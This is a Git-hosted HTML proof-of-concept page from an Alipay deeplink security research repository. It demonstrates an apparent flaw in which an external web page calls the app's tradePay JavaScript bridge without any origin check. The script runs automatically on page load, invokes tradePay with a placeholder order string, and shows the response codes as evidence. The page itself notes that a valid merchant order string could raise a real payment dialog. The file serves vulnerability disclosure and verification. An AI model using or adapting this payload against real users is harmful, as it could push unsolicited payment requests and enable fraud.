icybear/alipay-deeplink-research
1
0
Fork 0
mirror of https://github.com/sgInnora/alipay-deeplink-research synced 2026-06-27 05:34:17 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
f490ce3296d8aa190b1c8ed31d068e7019b44fd2
alipay-deeplink-research/poc/payload_cve3.html
feng cae3c54867 feat: global navigation bar + verification badge across all 9 pages 
- Unified nav bar with links to all research articles
- Verification badge: Docker 37/37, Zenodo DOI, IACR 2026/526, Packet Storm
- Mobile responsive hamburger menu
- PoC payloads and evidence screenshots added
- Draft articles and planning files included

Co-Authored-By: Claude <noreply@anthropic.com>
2026-03-25 05:31:19 +08:00

148 lines
6.8 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html><head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>CVE-3 Verification</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:-apple-system,system-ui,sans-serif;background:#fff;color:#333;padding:16px}
.banner{background:#f5222d;color:#fff;padding:16px;border-radius:10px;text-align:center;margin-bottom:16px}
.banner h1{font-size:18px}
.banner p{font-size:12px;opacity:.85;margin-top:4px}
.result{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
.result h2{color:#389e0d;font-size:15px;margin-bottom:8px}
.fail{background:#fff2f0;border-color:#ff4d4f}
.fail h2{color:#cf1322}
.pending{background:#fffbe6;border-color:#faad14}
.pending h2{color:#d48806}
.item{padding:6px 0;border-bottom:1px solid #f0f0f0;font-size:13px}
.item:last-child{border:none}
.label{color:#888;font-size:11px}
.value{color:#333;font-weight:600}
.warn{background:#fff7e6;border:1px solid #ffd591;border-radius:8px;padding:10px;font-size:11px;color:#d46b08;margin:10px 0;line-height:1.5}
.ts{color:#999;font-size:10px;text-align:center;margin-top:16px}
#status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
</style>
</head><body>
<div class="banner">
<h1>CVE-3: tradePay Unauthorized Invocation</h1>
<p>CWE-940 | CVSS 8.6 | Payment dialog triggered from external page</p>
</div>
<div class="warn">
<b>Safety:</b> This test uses an INVALID order string "SECURITY_TEST_INVALID_ORDER_2026".
No real transaction will occur. The proof is that the payment dialog appears at all —
an external page should NEVER be able to invoke tradePay.
</div>
<div id="status">Waiting for AlipayJSBridge...</div>
<div id="results"></div>
<div class="ts" id="timestamp"></div>
<script>
var el = document.getElementById('results');
var status = document.getElementById('status');
var tradePayResults = [];
function render() {
var html = '';
var isAlipay = /AlipayClient|Nebula/i.test(navigator.userAgent);
html += '<div class="result"><h2>Environment</h2>';
html += '<div class="item"><span class="label">Page Origin: </span><span class="value">' + location.origin + '</span></div>';
html += '<div class="item"><span class="label">Inside Alipay: </span><span class="value">' + (isAlipay ? 'YES' : 'Detection pending') + '</span></div>';
html += '<div class="item"><span class="label">JSBridge: </span><span class="value">' + (window.AlipayJSBridge ? 'AVAILABLE' : 'Not loaded') + '</span></div>';
html += '</div>';
if (tradePayResults.length > 0) {
var latest = tradePayResults[tradePayResults.length - 1];
html += '<div class="result' + (latest.dialogShown ? '' : ' fail') + '"><h2>tradePay Invocation Result</h2>';
html += '<div class="item"><span class="label">API Called: </span><span class="value" style="color:#f5222d">AlipayJSBridge.call("tradePay", ...)</span></div>';
html += '<div class="item"><span class="label">Order String: </span><span class="value" style="font-size:10px;word-break:break-all">' + latest.orderStr + '</span></div>';
html += '<div class="item"><span class="label">Response Code: </span><span class="value">' + (latest.resultCode || 'N/A') + '</span></div>';
html += '<div class="item"><span class="label">Response: </span><span class="value" style="word-break:break-all;font-size:10px">' + latest.rawResponse + '</span></div>';
html += '<div class="item"><span class="label">Timestamp: </span><span class="value">' + latest.time + '</span></div>';
if (latest.dialogShown) {
html += '<div class="item"><span class="label">CRITICAL: </span><span class="value" style="color:#f5222d">Payment dialog was triggered from an external attacker page!</span></div>';
}
html += '</div>';
// Proof section
html += '<div class="result"><h2>Vulnerability Proof</h2>';
html += '<div class="item"><span class="label">What happened: </span><span class="value">External page at ' + location.origin + ' called tradePay JSAPI</span></div>';
html += '<div class="item"><span class="label">Expected: </span><span class="value">tradePay should ONLY be callable from Alipay-owned/trusted pages</span></div>';
html += '<div class="item"><span class="label">Actual: </span><span class="value" style="color:#f5222d">tradePay was invoked from external domain — no origin check</span></div>';
html += '<div class="item"><span class="label">Root Cause: </span><span class="value">TradePayBridgeExtension.tradePay() does not validate calling page origin</span></div>';
html += '<div class="item"><span class="label">Real Attack: </span><span class="value">With a valid merchant orderStr, this could trigger real payment dialog</span></div>';
html += '</div>';
} else if (window.AlipayJSBridge) {
html += '<div class="result pending"><h2>tradePay Test Ready</h2>';
html += '<div class="item"><span class="label">Status: </span><span class="value">About to call tradePay with invalid order...</span></div>';
html += '</div>';
}
el.innerHTML = html;
document.getElementById('timestamp').textContent = 'Evidence collected at: ' + new Date().toISOString();
}
function tryTradePay() {
if (!window.AlipayJSBridge) return;
var orderStr = 'SECURITY_TEST_INVALID_ORDER_2026';
status.textContent = 'Calling tradePay...';
status.style.color = '#fa8c16';
render();
AlipayJSBridge.call('tradePay', {
orderStr: orderStr
}, function(result) {
var entry = {
time: new Date().toISOString(),
orderStr: orderStr,
rawResponse: JSON.stringify(result),
resultCode: result.resultCode || result.result_code || 'N/A',
dialogShown: false
};
// resultCode 6001 = user cancelled (means dialog DID appear)
// resultCode 4000 = order error (API was reached but order invalid)
// resultCode 8000 = processing
// resultCode 9000 = success (should not happen with invalid order)
var code = String(result.resultCode || result.result_code || '');
if (code === '6001' || code === '6002' || code === '4000' || code === '8000' || code === '9000') {
entry.dialogShown = true;
status.textContent = 'tradePay INVOKED — Response code: ' + code;
status.style.color = '#f5222d';
} else {
status.textContent = 'tradePay called — Response: ' + JSON.stringify(result).substring(0, 100);
status.style.color = '#fa8c16';
}
tradePayResults.push(entry);
render();
});
}
function checkBridge() {
if (window.AlipayJSBridge) {
status.textContent = 'AlipayJSBridge detected — invoking tradePay...';
render();
setTimeout(tryTradePay, 500);
} else {
status.textContent = 'Page loaded at ' + location.origin + ' — waiting for bridge...';
render();
}
}
document.addEventListener('AlipayJSBridgeReady', function() {
checkBridge();
});
checkBridge();
setTimeout(checkBridge, 1000);
setTimeout(checkBridge, 3000);
</script>
</body></html>
Reference in New Issue View Git Blame Copy Permalink